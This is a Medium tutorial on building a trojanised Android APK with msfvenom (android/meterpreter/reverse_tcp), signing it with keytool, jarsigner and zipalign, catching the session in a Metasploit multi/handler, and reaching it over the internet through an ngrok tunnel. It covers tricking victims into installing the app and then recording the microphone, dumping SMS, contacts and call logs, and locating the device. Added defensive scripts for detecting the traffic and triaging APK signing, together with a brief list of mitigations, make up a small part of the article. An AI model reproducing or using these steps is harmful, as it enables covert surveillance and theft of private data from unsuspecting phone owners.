How To Exploit Any Android Device Using Msfvenom and Metasploit Framework - by Archana Tulsiyani - Medium


9/13/23, 12:31 AM How to exploit any android device using msfvenom and Metasploit Framework | by Archana Tulsiyani | Medium

How to exploit any android device using msfvenom and Metasploit Framework
Archana Tulsiyani · Follow
9 min read · Apr 22, 2021

Learn how you can exploit and get any sensitive information from any android
device.

Photo by Denny Müller on Unsplash

In this tutorial, we’ll learn how to use MSFvenom and the Metasploit framework to
exploit an Android mobile device. We’ll build the payload with MSFvenom, save it as
a .apk file, and add a listener in Metasploit. An attacker gains control through a
Metasploit session once the user/victim downloads and installs the malicious .apk.
To do so, an attacker would need to use social engineering to get the .apk onto the
victim’s mobile device. We’ll see it with LAN and WAN. For this tutorial I am using
an Android emulator.

https://archanatulsiyani21.medium.com/how-to-exploit-any-android-device-using-msfvenom-and-metasploit-framework-9e90af4a4d7b 1/22

Components:

Attack Machine: Kali Linux (you can use any other Linux-based system, but I
prefer Kali Linux)

Victim Machine: Android Emulator

Other tools used: Keytool(in-built), jarsigner(in-built) and Zipalign.

What is Keytool?

Keytool is a key and certificate management tool. It enables users to manage their
own private and public key pairs and the associated certificates for
self-authentication (where the user authenticates himself to other users/services)
using digital signatures. It also enables users to cache their communicating
partners’ public keys (in the form of certificates).

What is Jarsigner?

The jarsigner tool uses keystore information to create or verify digital signatures
for Java ARchive (JAR) files. (A JAR file packages class files, pictures, sounds,
and/or other digital data in a single file.) jarsigner checks the digital signature
of a JAR file using the certificate that comes with it (included in the JAR file’s
signature block), and checks whether or not the public key of that certificate is
“trustworthy”, that is, contained in the designated keystore.

Please note: the javakey tool in JDK 1.1 has been fully replaced by the keytool
and jarsigner tools. These new tools provide more features: they not only generate
certificates but can also verify them.

What is MSFvenom?

MSFvenom is the product of merging “MSFpayload” and “MSFencode.” These tools are
particularly useful for creating payloads in a variety of formats and encoding them
with different encoder modules. By combining these two tools into one, you can
optimize the command-line options while also speeding up the process by using a
single framework. MSFvenom will be used to build our malicious .apk payload.

Method 1: Exploiting on LAN

Before starting this tutorial you must keep in mind that the target should be on the
same network as the attacker.

Step 1: Creating a malicious apk

Open the terminal in Kali Linux and type the following command:

msfvenom -p android/meterpreter/reverse_tcp LHOST= localhost Ip LPORT= 4444 R > filename.apk

Arguments explained

-p — Payload to be used

LHOST — Local host IP to receive a back connection (check yours with the ifconfig
command)

LPORT — Local port on which the listener waits for the victim’s connection (we set
it to 4444)

R — Raw format (we select .apk)

You can use any port number you want; I used 4444. The filename for this payload is
“android_shell.apk”. This file will be installed on the Android device of our target.
However, we must first set up our listener before this file is downloaded.

Step 2: Verify the apk is created

You can use the command ls -la to verify the apk file is created

Step 3: Sign the Certificate

After we’ve successfully created the .apk file, we’ll need to sign it with a
certificate, because Android devices won’t let us install apps unless they are
properly signed. Only signed .apk files are installed on Android devices.

In Kali Linux, we must manually sign the .apk file with:

Keytool (preinstalled)

jarsigner (preinstalled)

zipalign (needs to be installed)

Let’s use Keytool first. Use the following command to generate the keystore used to
sign the .apk file:

keytool -genkey -v -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000

Let’s use Jarsigner to sign the apk file. Use the following command:

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore android_shell.apk hacked

Verify if the application is signed by using the following command:

jarsigner -verify -verbose -certs android_shell.apk

Zipalign is not preinstalled in Kali Linux, so you have to install it with the
command:

apt-get install zipalign

Let’s align the signed .apk into a new file using zipalign with the command:

zipalign -v 4 android_shell.apk singed_jar.apk

We’ve successfully signed our android_shell.apk file, and it can now be used in any
Android environment. Following the Zipalign verification, our updated filename is
singed_jar.apk.

Step 4: Setup Listener on Metasploit

Load the Metasploit console using msfconsole. After it’s loaded (it may take a few
minutes), select the multi-handler exploit using the command

use exploit/multi/handler

Now, set up the reverse payload

set payload android/meterpreter/reverse_tcp

Set LHOST (your local IP) and LPORT to the values you used to generate the
payload. Here port number 4444 is used. If you don’t know your IP address you can
always check with the ifconfig command.

set LHOST <your-ip-address>

set LPORT 4444

Type the run or exploit command to start the listener.

Step 5: Configure Android Emulator

For this tutorial, I am using an Android emulator. Let’s quickly install the android
emulator.

You can download the Android x86 code from Google Code. Follow the steps below
to install the Android emulator:

· In the VMware workstation, build a virtual machine

· In the VMware options, mount the ISO file.

· Complete the procedure and start the computer in LIVE mode.

· Configure the Android computer.

· Create a Google account.

Note: With an Ethernet adapter, the Android x86 project will link to a local network
(VMnet8). You can use a CLI Android emulator if you are using another emulator to
penetrate the Android device.

Step 6: Install Malicious apk in the target device

Once the app is installed on the target device, run the application. When the
victim opens the application, you will get access to the Android phone. The target,
however, will not suspect anything.

As you can see in the screenshot, we have successfully acquired a Meterpreter
session on the Android device. Let’s start with some common commands.

Sysinfo

This will show you information regarding the system you have access to.

Root Check

This command will let you know if the device is rooted or not.

Record Mic

This command will record the sounds on the victim’s end.

Get WAN Geo Location, Dumped SMS, Dumped Call Logs, and Change the audio mode.

These commands will give you the WAN geolocation, dump the call logs (if any) and
the messages, and change the audio mode of the Android device. Here I am using an
Android emulator, so there are no text messages or call logs.

Dump Contacts

This command will save the list of contacts stored on the device to a text file.

You can see the dumped contacts using the cat command: cat <name of the file>.

Webcam snap

This command will take a screenshot of the screen of the device.

Get Uid

This command will give you the uid of the device

Application List

This command will show you the list of applications installed on the Android
device.

Apart from these commands, there are various other commands that you can run.
You can find the list of commands using ?

Method 2: Exploitation over WAN

In a WAN, you usually need a Static IP/Hostname and then Port Forwarding to
enable traffic transmission, and we all know that these are difficult to do in real-
time because we have restricted access to ports in a network.

As a result, in this case, we’ll use Ngrok to build a safe tunnel.

Ngrok is a tunneling reverse proxy technology that creates tunnels from a public
endpoint, such as the internet, to a network service that is running locally. This can
be used to generate a public HTTP/HTTPS URL for a website that is hosted locally
on our machine. When using Ngrok, we don’t need to use any port forwarding, and
our network service will eventually be exposed to the internet through TCP
tunneling.

Follow the steps below

Step 1: Create a Ngrok Account

Sign up for an Ngrok account; it will lead you to the download page.

You can choose the OS you are working on from here and download ngrok.

Step 2: Connect your account

When you run the command below, your auth token will be added to the default
ngrok.yml configuration file. This will give you access to more features and allow
you to stay online for longer periods. (After signing in, copy and paste your token
here from the ngrok home screen.)

./ngrok authtoken <your-token>

You’re now able to put this tool to work.

./ngrok tcp [port no]

Use the port number to which you want to bind the connection.

The TCP tunnel provided by ngrok is defined by the forwarding entry in the output.
The link is now connected to the port number of your choice on localhost.

After these two steps, follow the rest of the steps as in Method 1, starting from
step 4.
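
How the traffic described in both methods can be spotted on the defender's side, as an added example that is not part of the original article: it scans an egress log for handset connections to the LPORT used here (4444) or to an ngrok TCP endpoint. The log format, the 10.0.8.x handset range, the function name and the ngrok hostname pattern are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Constructed sample egress log: "<time> <source-ip> <dest-host> <dest-port>".
SAMPLE_LOG = """\
2024-01-01T10:00:02Z 10.0.8.21 192.168.1.50 4444
2024-01-01T10:00:05Z 10.0.8.21 0.tcp.ngrok.io 17823
2024-01-01T10:00:09Z 10.0.8.40 play.googleapis.com 443
2024-01-01T10:02:05Z 10.0.8.21 0.tcp.ngrok.io 17823
2024-01-01T10:03:11Z 172.16.4.9 6.tcp.eu.ngrok.io 4444
malformed line
"""

LISTENER_PORTS = {4444}  # LPORT used in this article; any port can be chosen
# Assumed hostname shape of ngrok TCP endpoints, e.g. 0.tcp.ngrok.io
NGROK_TCP = re.compile(r"(?:^|\.)tcp(?:\.[a-z]{2})?\.ngrok\.io$")

def find_suspect_flows(log_text, handset_prefixes=("10.0.8.",)):
    """Group flagged connections from handset subnets by (src, host, port)."""
    hits = defaultdict(lambda: {"count": 0, "reasons": set()})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4 or not parts[3].isdigit():
            continue  # skip lines that do not parse
        _, src, host, port = parts
        if not src.startswith(handset_prefixes):
            continue  # only look at the mobile-device address range
        reasons = set()
        if int(port) in LISTENER_PORTS:
            reasons.add("listener-port")
        if NGROK_TCP.search(host.lower()):
            reasons.add("ngrok-tcp-tunnel")
        if reasons:
            entry = hits[(src, host, int(port))]
            entry["count"] += 1
            entry["reasons"] |= reasons
    return {k: (v["count"], sorted(v["reasons"])) for k, v in hits.items()}

if __name__ == "__main__":
    for flow, (count, reasons) in find_suspect_flows(SAMPLE_LOG).items():
        print(flow, count, reasons)
```

Because the port is freely chosen, the port match alone is a weak signal; the tunnel hostname and repeated connections from the same handset carry more weight.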

How to Mitigate attacks like these

Don’t allow applications to be downloaded from cloud sites.

Don’t install apps with unknown source options enabled.

Use antivirus.

Don’t click on any unrelated or unknown links.

Never download any unwanted .doc, .pdf or .apk file.

Always double-check the source before downloading.
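
One way to double-check a downloaded .apk before installing it, as an added example that is not part of the original article: it reads the signing metadata that the keytool/jarsigner steps above leave behind (signature files named after the key alias, SHA-1 digests, no APK Signing Block). The function names and the sample archive are constructed for illustration.

```python
import io, re, struct, zipfile

V2_MAGIC = b"APK Sig Block 42"  # last 16 bytes of an APK Signing Block (v2+)

def build_sample_apk(alias="hacked"):
    """Constructed sample: a zip laid out like a jarsigner-signed (v1) .apk."""
    base = alias.upper()[:8]  # jarsigner names .SF/.RSA after the key alias
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("classes.dex", b"constructed placeholder, not real code")
        z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\r\n\r\n"
                   "Name: classes.dex\r\nSHA1-Digest: AAAA\r\n\r\n")
        z.writestr(f"META-INF/{base}.SF", "Signature-Version: 1.0\r\n"
                   "SHA1-Digest-Manifest: BBBB\r\n\r\n")
        z.writestr(f"META-INF/{base}.RSA", b"\x30\x82")  # dummy bytes
    return buf.getvalue()

def has_v2_block(data):
    """True if an APK Signing Block sits right before the central directory."""
    eocd = data.rfind(b"PK\x05\x06")  # End of Central Directory record
    if eocd < 0 or eocd + 20 > len(data):
        return False
    (cd_off,) = struct.unpack_from("<I", data, eocd + 16)
    return cd_off >= 16 and data[cd_off - 16:cd_off] == V2_MAGIC

def triage(data):
    """Summarise how an .apk was signed and flag weak or legacy signing."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        signers = sorted(m.group(1) for n in names
                         if (m := re.fullmatch(r"META-INF/([^/]+)\.(?:RSA|DSA|EC)", n)))
        digests = set()
        for n in names:
            if re.fullmatch(r"META-INF/[^/]+\.(?:MF|SF)", n):
                text = z.read(n).decode("utf-8", "replace")
                digests |= set(re.findall(r"^(SHA-?\d+)-Digest", text, re.M))
    v2 = has_v2_block(data)
    flags = []
    if not signers and not v2:
        flags.append("unsigned")
    if signers and not v2:
        flags.append("v1 (JAR) signature only")
    if "SHA1" in digests or "SHA-1" in digests:
        flags.append("SHA-1 digests")
    return {"signers": signers, "digests": sorted(digests),
            "v2_block": v2, "flags": flags}

if __name__ == "__main__":
    print(triage(build_sample_apk()))
```

These are triage signals, not a verdict; the script reads signing metadata and does not verify the signature cryptographically.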

Conclusion

This is how an Android device can be exploited and accessed regardless of the type
of connection between both the attacker and the victim. It can be seen that it is very
easy to hack into an android device when the user is unaware.

Such apps may be shared in click-to-click social media groups to attract users
without informing them of the attack.

Please note that you’re not advised to use this tutorial for an illegal purpose. This is
for educational purposes only. I am not responsible for any illegal activity
performed
